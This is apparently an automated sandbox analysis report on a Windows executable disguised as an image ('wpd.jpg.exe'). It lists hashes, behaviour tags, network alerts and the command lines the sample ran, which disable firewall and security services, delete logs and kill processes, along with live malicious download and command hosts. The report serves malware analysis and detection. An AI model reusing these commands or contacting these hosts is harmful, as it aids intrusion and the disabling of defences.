Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6401 | June 7, 2024, 5:49 p.m. | June 7, 2024, 5:51 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 | b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638 |
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara | |
Processes
PID | Process | Command line |
---|---|---|
2760 | cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
2804 | taskkill.exe | taskkill /f /im csrs.exe |
2956 | sc.exe | sc start netprofm |
3032 | sc.exe | sc config netprofm start= auto |
940 | sc.exe | sc start NlaSvc |
2100 | sc.exe | sc config NlaSvc start= auto |
2244 | cmd.exe | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
3420 | taskkill.exe | taskkill /im csrs.exe /f |
3588 | csrs.exe | csrs.exe -m 6 -t 200 -l 9999 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:50002 -> 192.168.57.143:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.101:49940 -> 192.168.57.79:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | suspicious_request |
---|---|
GET method with no useragent header, Connection to IP address | GET http://104.37.187.182/xpxmr.txt |
GET method with no useragent header, Connection to IP address | GET http://104.37.187.182/ok/wpd.html |
Connection to IP address | GET http://104.37.187.182/wpdmd5.txt |
Connection to IP address | GET http://104.37.187.182/wpdtest.txt |
GET method with no useragent header, Connection to IP address | GET http://104.37.187.182/ver.txt |
GET method with no useragent header, Connection to IP address | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 |
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b |
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 |
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\python27.dll |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI35442\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | xx2 (virtual_address 0x005ac000, virtual_size 0x0085f2c0, size_of_data 0x0085f400) | entropy | 7.92303226231 | description | A section with a high entropy has been found |
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
description | rule |
---|---|
Create a windows service | Create_Service |
Communications over RAW Socket | Network_TCP_Socket |
Communication using DGA | Network_DGA |
Match Windows Http API call | Str_Win32_Http_API |
Take ScreenShot | ScreenShot |
Escalate privileges | Escalate_priviledges |
Steal credential | local_credential_Steal |
PWS Memory | Generic_PWS_Memory_Zero |
Record Audio | Sniff_Audio |
Communications over HTTP | Network_HTTP |
Communications use DNS | Network_DNS |
Code injection with CreateRemoteThread in a remote process | Code_injection |
(no description) | DebuggerCheck__GlobalFlags |
(no description) | DebuggerCheck__QueryInfo |
(no description) | DebuggerCheck__RemoteAPI |
(no description) | DebuggerHiding__Thread |
(no description) | DebuggerHiding__Active |
(no description) | DebuggerException__ConsoleCtrl |
(no description) | DebuggerException__SetConsoleCtrl |
(no description) | ThreadControl__Context |
(no description) | SEH__vectored |
(no description) | Check_Dlls |
Checks if being debugged | anti_dbg |
Anti-Sandbox checks for ThreatExpert | antisb_threatExpert |
Bypass DEP | disable_dep |
Affect hook table | win_hook |
File Downloader | Network_Downloader |
Match Windows Inet API call | Str_Win32_Internet_API |
Communications over FTP | Network_FTP |
Run a KeyLogger | KeyLogger |
Communications over P2P network | Network_P2P_Win |
cmdline | sc start NlaSvc |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | taskkill /im csrs.exe /f |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config netprofm start= auto |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | net stop WinNsaSrv |
host | 104.37.187.182 |
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 189 seconds, actually delayed analysis time by 189 seconds |
description | csrs.exe tried to sleep 1733 seconds, actually delayed analysis time by 1733 seconds |
url | http://104.37.187.182/ok/wpd.html |
url | http://123.123.123.123 |
url | http://104.37.187.182/wpdmd5.txt |
url | http://123.123.123.123:54321/dlr.arm |
url | http://139.5.177.32:9999/ |
url | http://185.47.128.124:8124/m17010.txt |
url | http://139.5.177.32:9999 |
dead_host | 139.5.177.32:9999 |
dead_host | 192.168.56.101:49426 |
dead_host | 192.168.56.101:49235 |
dead_host | 192.168.56.103:49432 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.101:1433 |
dead_host | 192.168.56.103:1433 |
dead_host | 192.168.56.101:49291 |